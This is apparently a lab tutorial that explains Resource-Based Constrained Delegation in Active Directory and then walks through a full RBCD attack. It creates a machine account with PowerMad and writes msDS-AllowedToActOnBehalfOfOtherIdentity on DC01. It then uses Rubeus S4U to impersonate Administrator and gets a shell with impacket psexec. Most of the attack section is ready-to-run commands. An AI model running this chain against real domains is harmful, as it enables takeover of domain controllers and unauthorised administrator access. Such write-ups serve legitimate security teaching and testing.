What is RBCD and How it works
RBCD (Resource Based Constrained Delegation). This is similar to the basic Constrained Delegation in which it allows you to configure which services an account can be delegated to resource-based constrained delegation changes how you can configure constrained delegation For example Instead of specifying which object/user can delegate to which service. Resource-based Constrain Delegation specifies which objects can delegate to it. From an administrative standpoint, this allows the resource owner to control who can access it.
- Another Example,
instead of specifying with constrained delegation that the zeba (Domain user) user account can delegate to the CIFS or LDAP service on DC01 to access the database
In Constrained Delegation instead of specifying with constrained delegation that the zeba (Domain user) user account can delegate to the CIFS or LDAP service on DC01 to access the database
On RBCD (Resource Based Constrained Delegation) you can specify on the DC01 CIFS, LDAP server account that the zeba (Domain User) user account has permissions to delegate access to it.
Setting up the lab
⇒ To perform this RBCD attack a user/machine must have generic write to another machine So we will be setting GenericWrite on DC01 for the user Zeba using ADUC [ Active Directory Users and Computer ] :
- Click on The machines Properties and on the security tab select the user and tick on Write
- Now on the BloodHound point of view you can see that our user zeba has generic write to DC
Performing Attack
Creating Computer Object
⇒ So for a person to perform this attack he/she must have Write on msDS-AllowedToActOnBehalfOfOtherIdentity attribute to a machine. as we can see in the bloodhound
- So first we will create a new computer object
AFTABin Active Directory using PowerMad
1
New-MachineAccount -MachineAccount AFTAB -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
- Copy the
Machine SID
Modifying Target Computer’s AD Object
- Next we will be getting the Security Descriptor of AFTAB and set
msds-allowedtoactonbehalfofotheridentityattribute forDC01
1
2
3
4
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;; S-1-5-21-1011749309-1128044670-722997229-1119)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
- Now we have successfully set the “msds-allowedtoactonbehalfofotheridentity”
Get-NetComputer DC01 | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
msds-allowedtoactonbehalfofotheridentityreset after every 5 min
Execution
⇒ So first we will get rc4 hash of the AFTAB machine password using Rubeus:
.\Rubeus.exe hash /password:123456 /user:AFTAB /domain:crt.local
1
.\Rubeus.exe s4u /user:AFTAB$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:Administrator /msdsspn:cifs/dc01.crt.local /outfile:dc.kirbi /ptt
For Computer ACcount we use $ sign
- Now we can access the dir On
DC01
1
2
net use O: \\dc01.crt.local
O:
- Even We can use
PsExecto connect remotely
( Make sure that is Enable-PSRemoting is enable on target host)
Using kirbi file into Kali
⇒ Moreover, the ticket obtained from Rubeus can also be parsed into Kali too. This can be achieved by converting the base64 encoded kirbi ticket into a clear text kirbi file. Then we can convert this kirbi ticket to ccache as kali doesn’t support Kirbi format(only Windows-specific and can be used with Rubeus).
- Copy the
dc_cifs_dc01.crt.local.kirbiinto our kali machine
- Convert the kirbi file into ccache
impacket-ticketConverter dc_cifs_dc01.crt.local.kirbi admin.ccache
- KRB5CCNAME is the variable that stores service tickets for AD attacks, export the ccache file
export KRB5CCNAME=/home/kali/admin.ccache
1
python3 psexec.py -k -no-pass crt.local/administrator@dc01.crt.local -dc-ip 192.168.1.109 -target-ip 192.168.1.109
